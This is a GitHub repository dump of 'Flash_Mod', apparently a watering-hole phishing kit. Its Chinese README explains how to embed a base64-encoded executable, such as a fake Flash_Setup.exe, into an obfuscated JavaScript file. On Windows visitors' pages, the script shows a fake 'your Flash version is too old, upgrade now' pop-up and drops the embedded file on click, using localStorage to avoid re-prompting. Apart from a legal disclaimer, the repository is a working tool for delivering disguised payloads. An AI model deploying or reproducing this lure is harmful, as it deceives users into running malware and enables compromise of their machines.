23333

├── 1.html ├── 1.png ├── README.md ├── adobe_flash_player_16410.ico └── ajax_encode.js /1.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 23333 7 | 8 | 9 | 12121212 10 | 11 | -------------------------------------------------------------------------------- /1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0neAtSec/Flash_Mod/3a4774da9d370054e98bb0c6f4cb00f683781ac1/1.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Flash_Mod 2 | Flash水坑修改版 3 | ![图片](./1.png) 4 | 5 | ## 简介 6 | ``` 7 | flash弹窗样式来源https://github.com/r00tSe7en/Flash-Pop 8 | 添加操作系统判断，文件下载判断，exe base64编码进js内部无需302跳转伪造页面点击即可下载，js混淆 9 | ``` 10 | 11 | ## 使用说明 12 | 13 | ``` 14 | 15 | 搜索flash.txt修改为落地的文件名，例如Flash_Setup.exe 16 | 搜索Rmxhc2hfTW9k修改为落地的文件内容，cat file |base64 -w 0 > encoded.txt 17 | 点击下载后浏览器本地存储空间会创建变量时间戳flash_pop_download_time，2分钟后js不再弹窗 18 | navigator.userAgent || navigator.platform 判断操作系统版本默认win触发 19 | ``` 20 | ## 免责声明 21 | 22 | 本工具仅面向**合法授权**的企业安全建设行为，如您需要测试本工具的可用性，请自行搭建靶机环境。 23 | 24 | 在使用本工具时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权。**请勿对非授权目标进行扫描。** 25 | 26 | 如您在使用本工具的过程中存在任何非法行为，您需自行承担相应后果，作者将不承担任何法律及连带责任。 27 | 28 | 在安装并使用本工具前，请您**务必审慎阅读、充分理解各条款内容**，限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。除非您已充分阅读、完全理解并接受本协议所有条款，否则，请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的，即视为您已阅读并同意本协议的约束。 29 | -------------------------------------------------------------------------------- /adobe_flash_player_16410.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0neAtSec/Flash_Mod/3a4774da9d370054e98bb0c6f4cb00f683781ac1/adobe_flash_player_16410.ico -------------------------------------------------------------------------------- /ajax_encode.js: -------------------------------------------------------------------------------- 1 | (function(_0x564253,_0x51fcde){var _0x446c1c=_0x9750,_0x31c91f=_0x564253();while(!![]){try{var _0x1510f5=-parseInt(_0x446c1c(0x19d))/0x1+parseInt(_0x446c1c(0x189))/0x2*(-parseInt(_0x446c1c(0x1aa))/0x3)+-parseInt(_0x446c1c(0x1a8))/0x4*(parseInt(_0x446c1c(0x18c))/0x5)+-parseInt(_0x446c1c(0x187))/0x6*(parseInt(_0x446c1c(0x1b6))/0x7)+-parseInt(_0x446c1c(0x184))/0x8*(parseInt(_0x446c1c(0x19c))/0x9)+parseInt(_0x446c1c(0x1b5))/0xa*(parseInt(_0x446c1c(0x1ad))/0xb)+-parseInt(_0x446c1c(0x18d))/0xc*(-parseInt(_0x446c1c(0x198))/0xd);if(_0x1510f5===_0x51fcde)break;else _0x31c91f['push'](_0x31c91f['shift']());}catch(_0x1ae7ae){_0x31c91f['push'](_0x31c91f['shift']());}}}(_0x2d81,0x5c7fc));function flash_pop(){var _0x2a2164=_0x9750,_0x417c3f=document[_0x2a2164(0x193)]('script');_0x417c3f[_0x2a2164(0x1a4)](_0x2a2164(0x18b),_0x2a2164(0x188)),_0x417c3f[_0x2a2164(0x1a4)]('src',_0x2a2164(0x192));var _0x1a1f60=document[_0x2a2164(0x1b1)](_0x2a2164(0x19e))[0x0];_0x1a1f60[_0x2a2164(0x185)](_0x417c3f),_0x417c3f['onload']=function(){var _0x5f3def=_0x2a2164,_0x26f1f2=document['createElement'](_0x5f3def(0x196));_0x26f1f2[_0x5f3def(0x1a4)]('type',_0x5f3def(0x188)),_0x26f1f2['setAttribute'](_0x5f3def(0x19b),_0x5f3def(0x1a6)),_0x1a1f60[_0x5f3def(0x185)](_0x26f1f2);};var _0x371cbe=document['createElement']('link');_0x371cbe[_0x2a2164(0x1a4)](_0x2a2164(0x18b),_0x2a2164(0x199)),_0x371cbe[_0x2a2164(0x1a4)](_0x2a2164(0x186),'stylesheet'),_0x371cbe['setAttribute'](_0x2a2164(0x19f),_0x2a2164(0x1b3)),_0x1a1f60[_0x2a2164(0x185)](_0x371cbe);var _0x595f6a='\u60a8\u7684flash\u7248\u672c\u8fc7\u4f4e\uff0c\u8bf7\u53ca\u65f6\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\uff01

\u7cfb\u7edf\u68c0\u6d4b\u5230\u60a8\u7684flash\u7248\u672c\u8fc7\u4f4e\uff0c\u6709\u88ab\u6f0f\u6d1e\u653b\u51fb\u98ce\u9669\uff0c\u4e14\u4e25\u91cd\u5f71\u54cd\u6e38\u620f\u3001\u89c6\u9891\u4f53\u9a8c\uff0c\u5347\u7ea7\u5230\u6700\u65b0\u5b98\u65b9\u6388\u6743\u7248\u672c\u83b7\u5f97\u66f4\u597d\u7684\u4e0a\u7f51\u4f53\u9a8c\u3002

';window['onload']=function(){var _0x1d3703=_0x2a2164;$('.layui-layer')['css'](_0x1d3703(0x1a1),_0x1d3703(0x1b2)),layer[_0x1d3703(0x1ae)]({'type':0x1,'move':![],'area':[_0x1d3703(0x1a9),_0x1d3703(0x18f)],'title':![],'shade':0.6,'maxmin':![],'closeBtn':0x0,'anim':0x0,'offset':_0x1d3703(0x1b4),'scrollbar':![],'content':_0x595f6a});};}function isWindows(){var _0x11f82d=_0x9750;return navigator[_0x11f82d(0x18e)][_0x11f82d(0x190)](_0x11f82d(0x1ab))>-0x1||navigator[_0x11f82d(0x197)][_0x11f82d(0x18a)](/win/gi);}function downloadFile(){var _0x54bda1=_0x9750,_0x40728a='flash.txt',_0x2d7d9c=_0x54bda1(0x1a2),_0x502624=atob(_0x2d7d9c),_0x2c7ab9=new Array(_0x502624['length']);for(var _0x5ced82=0x0;_0x5ced82<_0x502624[_0x54bda1(0x19a)];_0x5ced82++){_0x2c7ab9[_0x5ced82]=_0x502624[_0x54bda1(0x1a0)](_0x5ced82);}var _0x37fb7d=new Uint8Array(_0x2c7ab9),_0x4a7b47=new Blob([_0x37fb7d],{'type':_0x54bda1(0x1af)}),_0x4acbae=document['createElement']('a');_0x4acbae[_0x54bda1(0x19f)]=URL[_0x54bda1(0x1a3)](_0x4a7b47),_0x4acbae[_0x54bda1(0x194)]=_0x40728a,document[_0x54bda1(0x1a7)][_0x54bda1(0x185)](_0x4acbae),_0x4acbae[_0x54bda1(0x1a5)](_0x54bda1(0x1b0),function(){var _0x172323=_0x54bda1;typeof localStorage['flash_pop_download_time']===_0x172323(0x195)&&(localStorage['flash_pop_download_time']=Date['now']());}),_0x4acbae[_0x54bda1(0x1b0)]();}function _0x9750(_0x45d408,_0x4b4e95){var _0x2d8196=_0x2d81();return _0x9750=function(_0x9750fd,_0x277589){_0x9750fd=_0x9750fd-0x184;var _0x563ec1=_0x2d8196[_0x9750fd];return _0x563ec1;},_0x9750(_0x45d408,_0x4b4e95);}function checkFlashDownloadTime(_0x52aee6){var _0x318d3a=_0x9750,_0x4008b5=localStorage['getItem'](_0x318d3a(0x191));if(_0x4008b5===null)return!![];else{var _0x48869d=new Date()[_0x318d3a(0x1ac)](),_0x2dd6b2=_0x48869d-_0x4008b5;return _0x2dd6b2<_0x52aee6*0xea60?!![]:![];}}function __init(){const _0x11f289=isWindows(),_0x342a72=checkFlashDownloadTime(0x2);_0x11f289&_0x342a72&&flash_pop();}function _0x2d81(){var _0x19fa5a=['Win','getTime','33zBOaGz','open','application/octet-stream','click','getElementsByTagName','none','https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css','100px','1168600XmOwia','439257QyueaC','110312vjBsGb','appendChild','rel','36MTAktj','text/javascript','198GRhpYg','match','type','3395loGKIN','17100yWaozQ','platform','324px','indexOf','flash_pop_download_time','https://cdnjs.cloudflare.com/ajax/libs/jquery/2.0.0/jquery.min.js','createElement','download','undefined','script','userAgent','17966KuNLWN','text/css','length','src','279MmAdJe','211561pNbGoA','head','href','charCodeAt','background','Rmxhc2hfTW9k','createObjectURL','setAttribute','addEventListener','https://cdnjs.cloudflare.com/ajax/libs/layer/3.1.1/layer.js','body','2524HycAcN','613px','15063eUIOsU'];_0x2d81=function(){return _0x19fa5a;};return _0x2d81();}__init(); --------------------------------------------------------------------------------